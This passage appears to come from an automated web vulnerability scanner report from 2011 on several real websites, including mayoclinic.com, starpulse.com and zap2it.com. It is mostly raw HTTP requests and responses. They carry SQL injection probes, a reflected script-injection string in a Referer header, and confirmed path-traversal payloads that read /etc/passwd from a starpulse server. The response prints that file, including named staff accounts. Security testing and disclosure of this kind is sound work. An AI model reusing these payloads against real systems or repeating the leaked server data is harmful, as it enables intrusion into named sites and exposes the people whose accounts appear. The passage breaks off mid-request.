Date: Wed, 11 May 2011 15:59:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 14699

(function(){var h=(navigator.appVersion.indexOf("MSIE")!=-1)?true:false;var J=(navigator.appVersion.toLowerCase().indexOf("win")!=-1)?true:false;var C=(navigator.userAgent.toLowerCase().indexOf("linux
...[SNIP]...
);var R=M[Q].substring(T+1,M[Q].length);P[S]=R}}}return P}function x(L){if(l){var i=document.getElementById(l);if(i){i.innerHTML=L;return}}document.write(L)}var b=D();var n=parseInt;var f="ooyalaPlayer294258174_10bh522";var l="";var a=n("900");var d=n("506");if(g||B){if(k=="1"||m=="1"){x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player.js?autoplay=0%27+and+1%3D1--+&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCodes=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&expires=1305133200&height=506&locale=en-us&signature=cJm71hLAbQnBypm3rzRgSgdP%2FbxgLngsiqj1VdZBzow&width=900'><\/script>")}else{x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player_error.js?reason=unAuthorizedStream&locale="+p+"&width="+a+"&height="+d+"'><\/script>")}}else{if(F(9,0,115)){var u="<div style='width:"+a+"px; height: "+d+"; overflow: hidden'>";var A="&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&width=900&height=506&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&video_pcode=92bWI68FEYwSG-GIuRuio-RFAHxq&contactServer=player.ooyala.com/Q2HGKJ-PryQsG7CT&text=_cKen3KTOeyeug5ZNHXzh7RNaRrDsZpj3TMLuE1X0KT5EXLGS4OoWk0_Bfm_e5Z3iPKmfqJ1wtg6wGt1QYjraDi0-2YswZnTCzIiwgx916NXZeqTR8yuK6lC5I2UU75hmLo1-1PgcGsbXLIS_nN_Fh8VGv1UU4l4slL4QW1h0vMfRGDM-b1HK6R0RUEHVWcauw0iBFXogAXJ8wwV-fKXSHGFeV5hj0zToKhdHtaZjsxGcXNs_aoec0AQK3CES6QCwhSIG8y6G5LUyzF_Qi3rClCyMVvf8NA9bBwuMgVbhNSsatgT6PAZTRU5R87uqMsuUi74h717E_wteYo_00YTuDQRQoHpPkaUlw54oRcVCcNR4NB16seqVUUMcDDJiwCYcnzlIAl0wBecDG4BdIiee_5Dw7Vf-ZarL-IR0vlEjspiwZuxnt32D8tAQVRescdSbgqvYsCcdBiVlAFpRiZlStCKPFfH2WyElaSL2LVXaXC2t86MHSn_RaJYDSLrNRUbe-7KnPKVmRj32-xxjO7IyUZU58J_i977Qwkpnh-QpRXYMpWghKemwenbtMvGGOyhijM8kmJkM3u82xgo1MHv7WLqQzlXjTJoAniWHEv_UvsC9200ok_jTe3xFLmCS3-F8ZazIac4_mlj6aNiSu0y1U4H4L3tY7ekBGd-Q2fVtyKmpV9ZajS-m1UQKBMJ6qHO7E2wcnIM_0ervHY_alKlZQr-k04PdjiVazoz-hsuYP0gRElSy-8OTZ1LmryvKg5fkeXCQIcE27if4lO9I-1Xl6VJxKyCik9Wtq4qtqU1HVf-8Z-kosjD2nP527lRXCodEES2GxL_7dIoO3kyNnK6mjrH5F4j9LS7tHVD
ZuwNsGRMzjgbiplvWKMGei-R8eg6IzKVtHAjKAvdmZX8Jd6ySuG1dY1OlxfV-TDHq52H5cUlMvZQTRPLhdYPe4KJAv8gMegAKMEFgD_LIlti7vwRugTIkyJVIBfW5AiFS9kwXDQftEvSxJ1izY6YhKUFoS7d9OIx2niFnRi-uHdcn-sFx7oH5UHihumQ4Cri2nxtR5s3Q
...[SNIP]...

Request 2

GET /player.js?autoplay=0'%20and%201%3d2--%20&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520c7b9a%22-alert(1)-%226d84b52305d

Response 2

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 15:59:02 GMT
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=300
Date: Wed, 11 May 2011 15:59:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 14377

(function(){var h=(navigator.appVersion.indexOf("MSIE")!=-1)?true:false;var J=(navigator.appVersion.toLowerCase().indexOf("win")!=-1)?true:false;var C=(navigator.userAgent.toLowerCase().indexOf("linux
...[SNIP]...
);var R=M[Q].substring(T+1,M[Q].length);P[S]=R}}}return P}function x(L){if(l){var i=document.getElementById(l);if(i){i.innerHTML=L;return}}document.write(L)}var b=D();var n=parseInt;var f="ooyalaPlayer497710943_10bh523";var l="";var a=n("900");var d=n("506");if(g||B){if(k=="1"||m=="1"){x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player.js?autoplay=0%27+and+1%3D2--+&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&embedCodes=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&expires=1305133200&height=506&locale=en-us&signature=iUEVte9f5HaJ1M131WCxeiYVSNnOcNKEJ5UUBu24uhw&width=900'><\/script>")}else{x("<script type='text/javascript'src='http://player.ooyala.com/mobile_player_error.js?reason=unAuthorizedStream&locale="+p+"&width="+a+"&height="+d+"'><\/script>")}}else{if(F(9,0,115)){var u="<div style='width:"+a+"px; height: "+d+"; overflow: hidden'>";var A="&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&width=900&height=506&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&video_pcode=92bWI68FEYwSG-GIuRuio-RFAHxq&contactServer=player.ooyala.com/Q2HGKJ-PryQsG7CT&text=fUej88OMHPb3U_tHoyCkvhse2QnPqpZT20h8KWdHl9JwlE5d2k2XfYSPjFOnYXP4AM5ubnKWjYy4ekw3Xx5b-hShkfQR7oy27op0D_vQQRU_rGGJ1mtWQwEWkhX7aqN7oO397yAuuUplCjtXoW5XpByiVUT2bdq7VCLoQsDi0WmQGY_bcgincfeA5Cf5pC_XHhzOirFtPB_9NRAN3jK0Ps4VbPd4fqaBqSOcb6P32Quplw6r96zwpi3gbcvBbofYEjNSxq3Cxu-fSkVKT9kB9cs1muOO2_pPBaucRD8LG6zckJlbeoScXeHOPyTbaiqgFmC4KC6RWzNNp-MR9RC4u83DS20ienlhHxpz0JdXBcvyyqBIDU1glw6V4WJbNEES5CW7G_ydv1Pw7J3k8uiAOVILX2-b23hSb-aMHqeoOn8Q6HdGCGB9GZo7BZPybATg7WFnzgtOUPdZlKjiXw3drB9ZIsPFepHL3SjPlMJJ_W1oWkWJm808qa4T6i65kD6AHZCEETGrFhmWSKpvdCOz4r381PooSb8-DkqV0FC38P0QcnKhZE0Cw5MOjAsyFnG_pM_W5QLC1M36IR9pH6DXvgpxtUxyXsek5MGNxUJhKZs2Y9bWBZHxAzsjaHiyfPHIsfRbwf3aqLpTywm0Chul04Xz8Cil2WTvMzPJMLCu7JfFosv7P-aeOpSdGeB4g8zdwf_qWrJnr4IXubn2G3T9duzFTmLLNNrmZCDFYC8jK4IJy4JIPxIdUvjJ4Aw95CH-XzKU865M7hVJjEfs6b9WF6FuHgi02nb-NxAsZZ002Aqnh05O1BCs3JnW_nw9eIzDbz084wSG-uat3mQj2cYnMaxL9Z0OEwFQQjrj7a
KGTEpxPmtxnijWZ1-A8kG69OxtovDrgX_6nwZVVSAFeQoGkY7Yt5pDw2a_PI1Na0Mty-Av5cIgnjBJfM2ikYuQNiV7IDrFn2jWu0lR9onuIIAjIymA9TtrmpFiFLp3FuQB-OlKTK1S_7WgmnLs3b4_AinyBPUGmw9h_0A61oFWR60ZhK2waipXzFNYHBEKoNPGw3wS_zm
...[SNIP]...

1.18. http://www.mayoclinic.com/health/pink-eye/DS00258 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mayoclinic.com
Path:   /health/pink-eye/DS00258

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /health/pink-eye/DS00258' HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 11 May 2011 15:24:13 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=59237231;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:13 GMT;path=/
Set-Cookie: CFTOKEN=96566466;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:13 GMT;path=/
Set-Cookie: JSESSIONID=803043628a413e9169c83b35431d2a5b195b;path=/
location: http://www.mayoclinic.com/invoke.cfm?ID=displayErrorPage&nErrorID=4670677
Content-Type: text/html; charset=UTF-8

Request 2

GET /health/pink-eye/DS00258'' HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 11 May 2011 15:24:14 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=56413216;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:14 GMT;path=/
Set-Cookie: CFTOKEN=21607096;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:24:14 GMT;path=/
Set-Cookie: JSESSIONID=a030c8e57c7f4af8bb75796763322d6c6a53;path=/
location: http://www.mayoclinic.com/health/page-not-found/404
Content-Type: text/html; charset=UTF-8


1.19. http://www.mayoclinic.com/health/pink-eye/DS00258 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mayoclinic.com
Path:   /health/pink-eye/DS00258

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /health/pink-eye/DS00258?1'=1 HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 11 May 2011 15:22:21 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=6602448;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:21 GMT;path=/
Set-Cookie: CFTOKEN=80404535;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:21 GMT;path=/
Set-Cookie: JSESSIONID=d430d04d9acac7e404997e606e1e13247950;path=/
location: http://www.mayoclinic.com/invoke.cfm?ID=displayErrorPage&nErrorID=4670662
Content-Type: text/html; charset=UTF-8

Request 2

GET /health/pink-eye/DS00258?1''=1 HTTP/1.1
Host: www.mayoclinic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 11 May 2011 15:22:22 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=59806861;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:22 GMT;path=/
Set-Cookie: CFTOKEN=41485298;domain=.mayoclinic.com;expires=Fri, 03-May-2041 15:22:22 GMT;path=/
Set-Cookie: JSESSIONID=6a30600f2f665bb3e3593552b65493a33f15;path=/
location: http://www.mayoclinic.com/health/page-not-found/404
Content-Type: text/html; charset=UTF-8


1.20. http://www.starpulse.com/sp_comments/paginate_comments.php [object_type parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starpulse.com
Path:   /sp_comments/paginate_comments.php

Issue detail

The object_type parameter appears to be vulnerable to SQL injection attacks. The payloads 95955136%20or%201%3d1--%20 and 95955136%20or%201%3d2--%20 were each submitted in the object_type parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sp_comments/paginate_comments.php?offset=0&limit=25&object_id=222525&object_type=095955136%20or%201%3d1--%20 HTTP/1.1
Host: www.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147392117.1305125763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147392117.1833191638.1305125763.1305125763.1305125763.1; __utmc=147392117; __utmb=147392117.1.10.1305125763; __gads=ID=c5cdb67679bbc497:T=1305125765:S=ALNI_Ma2G0hQC62Wu8GFslZjcHMEMsIgZQ; __qca=P0-2123288066-1305125769395

Response 1

HTTP/1.0 500 Internal Server Error
Date: Wed, 11 May 2011 15:05:37 GMT
Server: Apache/2.2.17 (FreeBSD) PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0

Request 2

GET /sp_comments/paginate_comments.php?offset=0&limit=25&object_id=222525&object_type=095955136%20or%201%3d2--%20 HTTP/1.1
Host: www.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147392117.1305125763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147392117.1833191638.1305125763.1305125763.1305125763.1; __utmc=147392117; __utmb=147392117.1.10.1305125763; __gads=ID=c5cdb67679bbc497:T=1305125765:S=ALNI_Ma2G0hQC62Wu8GFslZjcHMEMsIgZQ; __qca=P0-2123288066-1305125769395

Response 2

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:05:47 GMT
Server: Apache/2.2.17 (FreeBSD) PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 0


1.21. http://www.zap2it.com/zap-partners-iframe,0,2002648.blurb [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.zap2it.com
Path:   /zap-partners-iframe,0,2002648.blurb

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /zap-partners-iframe,0,2002648.blurb?1111&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=88001f2-12fdf8e677a-54f87f38-1; __qca=P0-1518749982-1305125748755; s_cc=true; s_dslv=1305125756067; s_dslv_s=First%20Visit; s_path=current; gpv_pp=Pop2it%20-%20zap2it%20-%20Blogs.%20-%20Cannes%20Film%20Festival%3A%20Uma%20Thurman%2C%20Jude%20Law%2C%20Salma%20Hayek%20and%20more%20kick%20things%20off; s_sq=%5B%5BB%5D%5D; __utmz=256511380.1305125756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=256511380.2118048213.1305125756.1305125756.1305125756.1; __utmc=256511380; __utmb=256511380.1.10.1305125756; rsi_segs=B08725_10011|B08725_10030|B08725_10070|D08734_70008|D08734_72078

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.zap2it.com/w3c/p3p.xml", CP="ALL DSP LAW DEVa TAIa OUR BUS UNI CNT STA PRE"
Content-Type: text/html
X-Instance-Name: i2s27z2n1
Last-Modified: Tue, 19 Apr 2011 22:40:26 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=281
Date: Wed, 11 May 2011 15:51:25 GMT
Connection: close
Content-Length: 23742


<html>
<head>
<title>Zap2it Partners</title>
<base target="_top">
<style type="text/css" media="all">@import "http://mserv.zap2it.com/redesign2010/oxygen2010.css";
body { background: transpar
...[SNIP]...
<a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/charlie-sheen-denise-richards-kids-child-custody-visitation-lawyers-office-sam-and-lola-daughters-warlock/'>Charlie and Denise FACE OFF Over Their Kids</a></p>
   

   <p id="rss-item-2" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/tapout-lawsuit-mma-cremation-mask-death-body-skyscrape-punkass-vials-ashes-remains-funeral-memorial-service/'>MMA Lawsuit -- You JACKED My Brother's Remains!!</a></p>
   

   <p id="rss-item-3" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/arnold-schwarzenegger-speaks-on-separation-maria-shriver-love-each-other-video/'>Arnold Speaks -- 'We Love Each Other Very Much'</a></p>
   

   <p id="rss-item-4" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/kobe-bryant-lawsuit-la-lakers-nba-basketball-counterfeit-staples-center-trademark-blake-griffin/'>Kobe Bryant Lawsuit -- Something Stinks at Staples</a></p>
   

   <p id="rss-item-5" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/10/arnold-schwarzenegger-maria-shriver-split-separation-divorce-governator-back-together/'>Arnold: I Want Maria Back!!!</a></p>
   


   <p class="rail-list-item"><a target="new" rel="nofollow" href="/zap-tmz-xmlfeed,0,2388713.xmlfeed" target="">More...</a></p>

</div>




</td>


<td class="item">    

<a target="new" href="http://www.toofab.com" rel="nofollow"><img src="http://www.zap2it.com/media/thumbnails/xmlfeed/2010-09/56211268-17081141.gif" alt="TooFab" border="0" width="130" height="31" /></a>


<!-- HACK: Work around to provide a body for this tag -->
<!-- so that the doAfterBody method is executed. -->

<!-- end HACK -->
<div class="rail-list">

   <p id="rss-item-1" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.toofab.com/2011/05/11/cannes-film-festival-red-carpet-french-riviera-rachel-mcadam
...[SNIP]...

Request 2

GET /zap-partners-iframe,0,2002648.blurb?1111&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=88001f2-12fdf8e677a-54f87f38-1; __qca=P0-1518749982-1305125748755; s_cc=true; s_dslv=1305125756067; s_dslv_s=First%20Visit; s_path=current; gpv_pp=Pop2it%20-%20zap2it%20-%20Blogs.%20-%20Cannes%20Film%20Festival%3A%20Uma%20Thurman%2C%20Jude%20Law%2C%20Salma%20Hayek%20and%20more%20kick%20things%20off; s_sq=%5B%5BB%5D%5D; __utmz=256511380.1305125756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=256511380.2118048213.1305125756.1305125756.1305125756.1; __utmc=256511380; __utmb=256511380.1.10.1305125756; rsi_segs=B08725_10011|B08725_10030|B08725_10070|D08734_70008|D08734_72078

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.zap2it.com/w3c/p3p.xml", CP="ALL DSP LAW DEVa TAIa OUR BUS UNI CNT STA PRE"
Content-Type: text/html
X-Instance-Name: i2s29z1n1
Last-Modified: Tue, 19 Apr 2011 22:40:26 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=300
Date: Wed, 11 May 2011 15:51:25 GMT
Connection: close
Content-Length: 23695


<html>
<head>
<title>Zap2it Partners</title>
<base target="_top">
<style type="text/css" media="all">@import "http://mserv.zap2it.com/redesign2010/oxygen2010.css";
body { background: transpar
...[SNIP]...
<a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/tapout-lawsuit-mma-cremation-mask-death-body-skyscrape-punkass-vials-ashes-remains-funeral-memorial-service/'>MMA Lawsuit -- You JACKED My Brother's Remains!!</a></p>
   

   <p id="rss-item-2" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/arnold-schwarzenegger-speaks-on-separation-maria-shriver-love-each-other-video/'>Arnold Speaks -- 'We Love Each Other Very Much'</a></p>
   

   <p id="rss-item-3" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/kobe-bryant-lawsuit-la-lakers-nba-basketball-counterfeit-staples-center-trademark-blake-griffin/'>Kobe Bryant Lawsuit -- Something Stinks at Staples</a></p>
   

   <p id="rss-item-4" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/10/arnold-schwarzenegger-maria-shriver-split-separation-divorce-governator-back-together/'>Arnold: I Want Maria Back!!!</a></p>
   

   <p id="rss-item-5" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/arnold-schwarzenegger-maria-shriver-split-seperate-divorce-marriage-napa-valley-yountville-terminator-meadowood-french-laundry/'>Arnold -- BRO-MANTIC Man Party After Separation</a></p>
   


   <p class="rail-list-item"><a target="new" rel="nofollow" href="/zap-tmz-xmlfeed,0,2388713.xmlfeed" target="">More...</a></p>

</div>




</td>


<td class="item">    

<a target="new" href="http://www.toofab.com" rel="nofollow"><img src="http://www.zap2it.com/media/thumbnails/xmlfeed/2010-09/56211268-17081141.gif" alt="TooFab" border="0" width="130" height="31" /></a>


<!-- HACK: Work around to provide a body for this tag -->
<!-- so that the doAfterBody method is executed. -->

<!-- end HACK -->
<div class="rail-list">

   <p id="rss-item-1" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.toofab.com/2011/05/11/cannes-film-festival-red-carpet-fre
...[SNIP]...

2. File path traversal
There are 3 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:



2.1. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featurecat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.starpulse.com
Path:   /feed/include/feature.inc.12-03-2010.php

Issue detail

The featurecat parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload News../../../../../../../../etc/passwd%00News was submitted in the featurecat parameter. The requested file was returned in the application's response.

Request

GET /feed/include/feature.inc.12-03-2010.php?featuretype=Friends&page_channel=News&featurecat=News../../../../../../../../etc/passwd%00News&feedoffset=0&featureid=Friends1&dwrite=1 HTTP/1.1
Host: cdn.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 14:58:11 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n29 ( iad-agg-n33), ms iad-agg-n33 ( origin>CONN)
Cache-Control: max-age=300
Expires: Wed, 11 May 2011 15:03:11 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 1745

document.write("<ul><li># $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $\n#\nroot:*:0:0:Charlie &:/root:/bin/csh\ntoor:*:0:0:Bourne-again Superuser:/root:\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System &:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin\nkmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin\ngames:*:7:13:Games pseudo-user:/usr/games:/usr/sb
...[SNIP]...
:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico\npop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin\nwww:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin\nnobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\n\ncklewin:*:100:100:Christopher Klewin -Sysadmin:/home/cklewin:/usr/local/bin/bash\npcartier:*:101:101:Paul Cartier -Staff:/home/pcartier
...[SNIP]...

2.2. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featuretype parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.starpulse.com
Path:   /feed/include/feature.inc.12-03-2010.php

Issue detail

The featuretype parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Friends../../../../../../../../etc/passwd%00Friends was submitted in the featuretype parameter. The requested file was returned in the application's response.

Request

GET /feed/include/feature.inc.12-03-2010.php?featuretype=Friends../../../../../../../../etc/passwd%00Friends&page_channel=News&featurecat=News&feedoffset=0&featureid=Friends1&dwrite=1 HTTP/1.1
Host: cdn.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
